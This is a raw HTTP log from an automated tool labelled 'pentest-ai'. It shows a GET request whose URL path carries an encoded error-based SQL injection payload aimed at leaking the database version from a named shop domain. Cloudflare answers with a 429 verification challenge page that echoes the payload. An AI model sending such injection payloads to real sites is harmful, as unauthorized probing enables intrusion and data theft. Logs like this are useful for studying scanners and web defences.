REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28%2A%29%2CCONCAT%28version%28%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29--/assets/component-totals.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10001
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847771fd2a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=d06f7RWXj6cG349%2FetOMy3t4nvoXAru1Rdk5%2Bg4SrwhW3pB1JLIem%2B7clunhqLy%2FKxEbL3PNeAyBCI7g6eAwyOULWrmeqCzcnBoVAXR2fdrcPVfZWF87IpCg2Z7K25px%2BtUkqW4qlpfxaVrkIg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847771fd2a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'Z79yn6rCkJhq.5VJMXLtYFU9k5vII4yI7r1ShKQNWSI-1784281163-1.2.1.1-e9GWmxwsJoh2OaG.CSw08Uhn4VapxmYiIrOyf9_DuVYvdIaYPIm8VwK563HJqmpB',cITimeS: '1784281163',cRay: 'a1c847771fd2a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/1'%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)--/assets/component-totals.css?__cf_chl_tk=QnGwBGt7NEo45aFGUVeKmKyyOncn3W9.l8VriyBmnH8-1784281163-1.0.1.1-ph3DjlZcLlnpBwA262IP9H5SXG7NpCjcwkz7YIMlRB8",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/1'%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)--/assets/component-totals.css?__cf_chl_f_tk=QnGwBGt7NEo45aFGUVeKmKyyOncn3W9.l8VriyBmnH8-1784281163-1.0.1.1-ph3DjlZcLlnpBwA262IP9H5SXG7NpCjcwkz7YIMlRB8",md: 'DH3yTHjBaLYylh7m_79CtG8YgpoRWWuQwCMYLwIre_s-1784281163-1.2.1.1-F_mvoq0RBhTuTsrTU6z9ePSGuWrGU3XS0sexJsmTrQPsL9aYFPw4d9.qdxjnC1QtQe7ZL_NIp64Q9UYoJgbNDl3SkUaFEfb8D3QvVaCDe7i2X3T7vpOp6lk1mclUHQeGevHVYbAPf0dxxtd55nFsvK_ZId.j54La2HywLHKfitEdDybbKUtXN97Q57R..lXFhEYBO60Uluz8wdjykkY589rv.DiTni1q3IMI1v2DT8cXIP468bAC7ACoNwRoqJum6EyP56MBAVWy6l50Ba6OD39QYld6a8ux_P34.SJU356l8CBxKAoPMAShrStb7plxIaM.2MaJ9ODvNGMy7lUjrD5olSCmGXaiHeISZFm0wkT9DF8PWact4P.hf7TS_bqtPYcGDZa2AoRK.v7JIynebecdZCXFlgKKqPKxqgz0KBUltzK2GEPvnFGN_.l9PkP0V1X5U_O940GOfcKXJ6ABxcSiUcIylb7nf2HdrISZaYtgUbwisdYsMRmiP9IVYHQZwO8vaeJsKkoDqpUKGRkhptGNLUXDxiNWaREBh6NXL2rkDzF80Ujkm.0z0TdhvNBuIioHa7L_E0J5RWgj89NXkka1Dth8GoxzSZUSjhGZuGBbSBomvzNKzpYUkIn_aE.tIJw_5ZL7pK3YsFqaE8.ohFRlN5V6C.9_eUJPz47X.AfWg_dIybxP6dhHJq90s_4zcO.j_5ttSXdA5fyNkvMRFC7bIFfjNEs4CfujdiSHoI96uBBg9JQacuL4C3tLbSq_VweKMXnbxVMUnve0kSN6_ng8U4CjvfSt8kXws8yWKV4vbBYW3kNPA4gZb6t1z88X1JVGa0YWSgYRdnyGipAxp_v3ouN73dWlqh2Nx6ZyomP6tYr4mI7vTrH1sWdcJ9h.DDegs244DLL0DeCCzYGhwt_32WVg398W.LTrk_Rv.UC7lEi4TS0d1BVP29oQNtKVEGKETkXun_TwE9TreI8uckqUM5zGVeb0dnZ0.Kq5G9UvqrV.G0s3L.bM4P.oCN0zxBSU3s83nfyEPB.lKZiIZhVYCh5d0bgBRUm8ArNeCVOXyS.ds42JkG5ZTvvYbInpA.uJtC3.FSI0vaISkyTy0EPas7wZCiwpG7Uiw64LWMpQ34a6q2.rcUyNrKUazqKmxHKh5xGI3DJLwhkH.lKHmHpWZygxkfs6PEll2dBukYtBcaLYcUwbbHlBT2VL8tJ0RVGn408WqbWo0LsX8RLc5XGmrgBCCtDn8fuKu8Pa_kEKZnIJe_HIo521BEPYkRgXuzf7ehn116bQ2forhKnSjAfMAOnIYNV03mp9CejnPJerNaY7cwr9M.GtXo1x0GujBczJWhmp4jZzHjEfi.dKuHN7fnAPkuTijHpYX48MM1i0_XzYG9L8XhhEoly0x5W2',mdrd: '9ca9r2_5mzUEHo838nfiivZjuUFxLBLtvJsN7.dRE.o-1784281163-1.2.1.1-ZJiivnlSGjClJHqIDVJhzBZXSj.94wwkI_Jp2XbsHN_rFQ9lRv7UgNkJBkuhp0v3PEBrCZbMBG2QJeCw63Z2.Z_SxZPnbKYKdge_55ijYyKD7CYLBSpUYsPJHBuZM6NuK0HlQUwQITxQAQCX0r3Zs.MQ69evV2EBMmF2iijBJzhumyne2hKbJMJC0svxuuSwUVLeCz8QthG7IyADRT8X_jQXbjvq_gjBkSRN5eTAG0IkuuHvNeYGkcOLPoumwZpp',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847771fd2a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/1'%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)--/assets/component-totals.css?__cf_chl_rt_tk=QnGwBGt7NEo45aFGUVeKmKyyOncn3W9.l8VriyBmnH8-1784281163-1.0.1.1-ph3DjlZcLlnpBwA262IP9H5SXG7NpCjcwkz7YIMlRB8"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
